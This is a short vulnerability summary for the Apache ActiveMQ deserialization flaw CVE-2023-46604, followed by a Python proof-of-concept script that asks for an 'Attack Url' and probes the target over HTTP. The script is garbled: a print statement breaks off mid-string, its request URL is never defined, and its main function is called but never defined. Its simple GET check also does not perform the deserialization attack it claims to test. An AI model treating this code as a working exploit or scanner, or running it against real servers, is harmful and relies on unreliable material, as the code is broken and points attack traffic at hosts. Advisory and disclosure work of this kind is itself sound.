# Vulnerability Summary ## Overview * **Vulnerability Name**: Apache ActiveMQ Remote Code Execution Vulnerability (CVE-2023-46604) * **Vulnerability Type**: Deserialization Vulnerability * **Description**: Apache ActiveMQ version 5.x contains a deserialization vulnerability. An attacker can exploit this flaw by crafting malicious requests to execute arbitrary code on the target server. ## Affected Scope * **Affected Component**: Apache ActiveMQ * **Affected Versions**: 5.0.0 to 5.18.3 ## Remediation * **Upgrade Version**: It is recommended to upgrade Apache ActiveMQ to **version 5.18.4** or later. ## POC Code ```python import requests import sys import random import re from requests.packages.urllib3.exceptions import InsecureRequestWarning def title(): print('+------------------------------------------') print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m') print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m') print('+ \033[34mWeChat Official Account : PeiQi文库 \033[0m') print('+ \033[34mVersion: Apache ActiveMQ test" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Language": "zh-CN,zh;q=0.9", "Content-Type": "application/json" } try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) if "test" in response.text and response.status_code == 200: print(f"\033[32m[o] Target {target_url} is vulnerable \033[0m") else: print(f"\033[31m[x] Target {target_url} is not vulnerable \033[0m") except Exception as e: print(f"\033[31m[o] Request error {e} \033[0m") if __name__ == '__main__': title() target_url = str(input("\033[35mPlease input Attack Url\nUrl >> \033[0m")) POC_1(target_url) ```